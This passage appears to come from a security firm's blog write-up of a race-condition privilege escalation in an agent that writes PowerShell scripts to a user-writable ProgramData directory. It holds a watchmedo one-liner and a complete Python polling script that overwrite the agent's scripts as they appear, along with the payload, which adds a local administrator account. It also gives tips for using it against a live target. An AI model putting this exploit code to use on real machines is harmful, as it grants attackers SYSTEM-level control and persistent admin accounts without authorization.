As we see, the PowerShell scripts are being written to the ProgramData directory in Windows. This is a very common place for applications to store files they need for their operation: writing there does not require elevated rights, so an application running in user space can still interact with the log or configuration files it keeps there. The flip side is that, by default, members of the Users group (which includes every authenticated user) can create files and folders under C:\ProgramData, and subdirectories created there inherit those rights unless the application's installer explicitly tightens the ACL. The effective permissions on a given agent directory can be checked with icacls, for example icacls C:\ProgramData\{agent directory}.
watchmedo shell-command --patterns="*.ps1" --recursive --command='copy {path to your powershell}.ps1 ${watch_src_path}' C:\ProgramData\{agent directory}
The command above instructs watchmedo to watch the agent directory recursively for events on paths matching *.ps1 (shell-command fires on any matching event, not only file creation) and, each time one fires, to run the copy command with ${watch_src_path} expanded to the path that triggered it, so the file we specify overwrites the agent's script. This let us replace the PowerShell scripts as they appeared even though we could not predict their directory name or file name in advance.
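The same trick as an added example, not the post's own tooling: it re-implements the watcher with only the Python standard library, polling the tree instead of using watchdog's change notifications, and it compares a file's contents to the payload before writing so that, unlike the watchmedo one-liner, it does not keep re-triggering on its own copy. The directory names, file names and payload text are placeholders, and the scenario in run_demo is constructed so the behaviour can be checked offline.

```python
"""Replace .ps1 files as an agent drops them into an unpredictable directory.

Added example, not the original post's tooling: it re-implements the watchmedo
shell-command trick with only the Python standard library, polling the tree
instead of subscribing to OS change notifications. The payload text and the
directory names are placeholders.
"""
import tempfile
import time
from pathlib import Path

# Assumed replacement script; mirrors the post's proof of concept.
PAYLOAD = (
    "net user /add raceCondition\r\n"
    "net localgroup Administrators raceCondition /add\r\n"
).encode()


def find_targets(root, suffix=".ps1"):
    """Every regular file under root with the given extension (case-insensitive, as on NTFS)."""
    return sorted(p for p in Path(root).rglob("*") if p.is_file() and p.suffix.lower() == suffix)


def replace_if_foreign(path, payload):
    """Overwrite path with payload unless it already holds payload.

    Comparing content first is what keeps the loop quiet: watchmedo's copy
    fires a fresh 'modified' event for the file it just wrote and re-runs the
    command, whereas here a file that already contains our script is skipped.
    Returns True only when a write happened.
    """
    try:
        if Path(path).read_bytes() == payload:
            return False
        Path(path).write_bytes(payload)
    except OSError:
        # The agent may still hold the file open or may have deleted it already;
        # the next poll will retry.
        return False
    return True


def poll_once(root, payload=PAYLOAD):
    """One pass over the tree; returns the paths that were overwritten."""
    return [p for p in find_targets(root) if replace_if_foreign(p, payload)]


def watch(root, payload=PAYLOAD, interval=0.05, timeout=None):
    """Keep polling until timeout (seconds) elapses; returns the number of files overwritten."""
    deadline = None if timeout is None else time.monotonic() + timeout
    count = 0
    while deadline is None or time.monotonic() < deadline:
        count += len(poll_once(root, payload))
        time.sleep(interval)
    return count


def run_demo():
    """Constructed scenario: an 'agent' drops a script into a directory with an unguessable name.

    Returns a dict of observations so the behaviour can be checked offline.
    """
    root = Path(tempfile.mkdtemp(prefix="ProgramData-agent-"))
    run_dir = root / "b7e1c9d2-fake-guid"      # hypothetical per-run directory name
    run_dir.mkdir()
    script = run_dir / "task.ps1"
    script.write_bytes(b"Write-Host 'legitimate agent task'\r\n")
    (run_dir / "task.log").write_bytes(b"not a script\r\n")

    first = poll_once(root)                    # replaces task.ps1
    second = poll_once(root)                   # nothing to do: content is already ours
    script.write_bytes(b"Write-Host 'agent rewrote it'\r\n")
    third = poll_once(root)                    # the agent rewrote the file, so replace it again
    return {
        "first_replaced": [p.name for p in first],
        "second_replaced": [p.name for p in second],
        "third_replaced": [p.name for p in third],
        "script_is_payload": script.read_bytes() == PAYLOAD,
        "log_untouched": (run_dir / "task.log").read_bytes() == b"not a script\r\n",
    }


if __name__ == "__main__":
    print(run_demo())
```

Against a live target you would call watch("C:\\ProgramData\\{agent directory}", timeout=...) instead of run_demo; polling is easier to reason about than the event stream but adds a window of up to one interval between the agent writing the file and the overwrite, so keep the interval short.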
For our replacement PowerShell script we used a very simple proof of concept to show that the agent executed our script as SYSTEM. We leveraged this flaw to escalate privileges by adding a new user to the target and making it a local administrator.
net user /add raceCondition
net localgroup Administrators raceCondition /add
echo "race won" >> {path to your desktop}\raceCondition.txt
This simple setup was very noisy when trying to trigger it (shell-command re-runs on every matching event, including the modification our own copy produces) and could be refined greatly, but it got the job done. While it ran we saw the output of our copy command each time there was a change in the directories we were monitoring.
From here we simply watched the desktop for the creation of our text file, which told us that the race had been won and our script executed, and then confirmed that our user had also been created, as we see here:
Are you looking for a security assessment for your network or applications? Send us an email at info@mccormackcyber.com